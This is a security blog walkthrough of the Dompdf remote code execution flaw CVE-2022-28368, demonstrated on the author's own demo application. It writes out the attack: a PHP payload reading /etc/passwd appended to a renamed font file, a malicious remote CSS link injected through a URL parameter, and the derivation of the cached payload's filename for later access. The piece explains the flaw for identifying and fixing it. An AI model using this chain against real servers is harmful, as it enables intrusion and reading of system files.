One of the options for converting or downloading the content from an HTML page of a web application is PDF. This necessitates the conversion of an HTML page into a PDF file. This conversion can be easily done by the browsers which let us print or save the HTML page to a PDF document. However, there are various scenarios where conversion of HTML content to PDF is not feasible by the browsers. For example, generating a PDF document from the HTML and CSS code or from the HTML content inside a frame of a web application. Additionally, there can be other functionality requirements that require HTML to PDF conversion outside of web browsers. This is where HTML to PDF conversion libraries come into the picture, such as Dompdf. It is one of the popular PHP libraries used to convert HTML content to PDF files. According to Dompdf's composer page, as of the time of writing this blog, it had around 54,951,888 installs.

It is critical for application security practitioners, developers, and other stakeholders to keep an eye on vulnerabilities affecting such a commonly used PHP library. In March 2022, security researchers from Positive Security identified a remote code execution (RCE) vulnerability in Dompdf. It was identified that Dompdf version <=1.2.0 is prone to remote code execution, which is mapped to CVE-2022-28368. In this blog, we will discuss this vulnerability in detail through a working demo. Understanding the fundamentals of the vulnerability and detailed steps to exploit it will be helpful in identifying, reproducing, and fixing it.

Dompdf version <= 1.2.0 is prone to remote code execution (RCE) when the "$isRemoteEnabled" configuration parameter is set to "true" and on version <= 0.8.5, it is prone to RCE irrespective of this configuration. Parameter "$isRemoteEnabled" allows Dompdf to access remote sites for images and CSS files as required. This feature is exploited to inject malicious CSS files into Dompdf and trick it to execute the malicious PHP payload.

To demonstrate how Dompdf can be exploited, I created a sample PHP website which will be referred as "Demo application" throughout this blog. The Demo application has the Dompdf library and an index.php page in the root directory.

Image

Figure 1 – Demo application

The demo application is a simple one-page website that converts an HTML page to a PDF file using Dompdf . It takes the HTML code as an input and outputs the formatted PDF. Below mentioned snippet shows the source code of the “index.php” file.

Image

Figure 2 - Source code of the Demo application

I also created an exploit server which has a malicious CSS file and a malicious font file "DejaVuSerif.php" hosted in the root directory. This is the malicious CSS file which will be referenced by the Demo application.

Image

Figure 3 - Malicious CSS and font file hosted in the exploit server

The font-face CSS rule defined in the malicious.css file points to the malicious font file “DejaVuSerif.php”.

Image

Figure 4 - Font-face CSS rule

The font file "DejaVuSerif.php" is created by changing the extension of the original "DejaVuSerif.ttf" file and adding a malicious payload at the end of the file. While processing the font file, the “php-font-lib” library in dompdf does not validate the extension of the font file, it only validates the file headers for a .ttf font file. File "DejaVuSerif.php" has a valid header of .ttf font file, a php payload and a modified extension ".php". The below snippet shows an inserted php payload at the end of the DejaVuSerif font file.

PHP payload : <?php system(‘cat /etc/passwd’); ?>

Image

Figure 5 - The malicious DejaVuSerif font file contains a php payload at the end of the file

Run the demo application using PHP's built-in web server.

Image

Figure 6 – Run the Demo application

From a second command line, run the exploit server using PHP's built-in web server.

Image

Figure 7 – Run the exploit server

The demo application is running, and the landing page of the application can be converted to a PDF file by passing the "pdf" parameter to the “index.php” page.

URL : http://[demo app ip]:7780/index.php

Image

Figure 8- Landing page of the Demo application

The parameter "pdf" is passed to the index.php page of the demo application in the URL. This causes the application to convert the HTML page to a PDF file using Dompdf library.

URL : http://[demo app ip]:7780/index.php?pdf

Image

Figure 9 – HTML page converted to PDF

In real-world testing engagements, when we encounter unique functionalities in web applications, it is critical to fingerprint as much of the application's tech stack as possible, including hosting server components and any libraries that are in play. In this case, we would download the PDF and extract the metadata of the document to inspect this information. Here we leverage the tool “Exiftool” to extract the PDF metadata. The extracted metadata clearly shows the library and its version in use, which is Dompdf 1.2.0.

Image

Figure 10 – Extract metadata using Exiftool

Now let us create a PDF file using the font style defined in a malicious CSS file hosted on the remote site. There are different ways to reference a remote CSS file when creating a PDF file. It depends on how it is coded in the application. In our case, we are referencing it by passing it as a parameter to the index.php page. Additionally, if "$isRemoteEnabled" parameter is set to "true", a CSS file from the remote site will be fetched and rendered. In a real-world situation, if the application sends the HTTP request to the exploit server requesting the malicious CSS file, it would mean that "$isRemoteEnabled" parameter is set to "true".

URL : http://[demo app ip]:7780/index.php?pdf&heading=<link rel=stylesheet href='http://[exploit server ip]:7781/malicious.css'>

Image

Figure 11 - Referencing CSS file hosted on the remote site

The Demo application receives an HTTP GET request that references the malicious CSS file hosted on the exploit server.

Image

Figure 12 - The Demo application server receives the request

The Demo application server processes the HTTP request and initiates a new HTTP request to the exploit server requesting malicious.css file which in turn calls the malicious font file "DejaVuSerif.php" as per the font face CSS rule. This confirms that the "$isRemoteEnabled" parameter is set to “true” in the Dompdf’s configuration in the Demo application.

Image

Figure 13 – Exploit server receives the request for malicious CSS file from the application server

When the font style defined in a remote CSS file is loaded and processed, it makes a second call to the malicious font file "DejavuSerif.php", which has a malicious payload. Dompdf executes the malicious payload in the “DejaVuSerif.php” font file and caches the file locally in the /libs/fonts sub-directory, and adds a corresponding entry in dompdf_font_family_cache.php. The cached font file has font’s data and the output of the malicious PHP command.

Image

Figure 14 - External font file is cached in the fonts directory

Image

Figure 15 - Cached font file with font’s data and output of the executed php command

Font file entry added in the dompdf_font_family_cache.php

Image

Figure 16 - External font entry in dompdf_font_family_cache.php file

The filename of the cached font file is deterministic and can be derived easily. It comprises of the fontname, style and md5 hash of the remote URL.

Filename = fontname+_+style+_+md5 hash+.+file extension

Which in this case is:

“dejavuserif”+_+”normal”+_+ 6acd2ea0820470d1cd5a983befed0cdc+.php

Md5 hash of “http://[exploit server ip]:7781/DejaVuSerif.php” is 6acd2ea0820470d1cd5a983befed0cdc

Hence, our filename is “dejavuserif_normal_6acd2ea0820470d1cd5a983befed0cdc.php”

Image

Figure 17 - A MD5 hash of the URL

If dompdf is installed in a web-accessible directory, then an adversary can access the cached font file under the /libs/fonts directory and view the output of the executed command. The below mentioned snippet shows the output of the “cat /etc/passwd” command.

URL : http://[demo app ip]:7780/dompdf/lib/fonts/dejavuserif_normal_6acd2ea0820470d1cd5a983befed0cdc.php

Image

Figure 18 - Accessing cached font file under /lib/fonts directory